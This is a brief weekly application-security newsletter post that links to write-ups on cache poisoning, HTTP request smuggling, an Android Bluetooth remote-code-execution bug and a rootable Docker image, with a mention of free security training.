Application Security This Week for April 26

Really great breakdown of exploitation of cache poisoning.

https://samcurry.net/abusing-http-path-normalization-and-cache-poisoning-to-steal-rocket-league-accounts/

Further reminder that HTTP is the weakest link.  Exploitation example of HTTP Request Smuggling.

https://honoki.net/2020/03/18/xxe-scape-through-the-front-door-circumventing-the-firewall-with-http-request-smuggling/

Extraodinarily hard to exploit but really fascinating to look at RCE bug in the Android Bluetooth stack.

https://insinuator.net/2020/04/cve-2020-0022-an-android-8-0-9-0-bluetooth-zero-click-rce-bluefrag/

A lot of people have put their online training up for free (for a limited time) like PluralSight.  Here’s another one, by Kontra.  I haven’t done it yet but it comes highly recommended.

https://blogs.akamai.com/sitr/2020/04/a-brief-history-of-a-rootable-docker-image.html

That’s it for the news of the week. Everyone stay safe and healthy!

S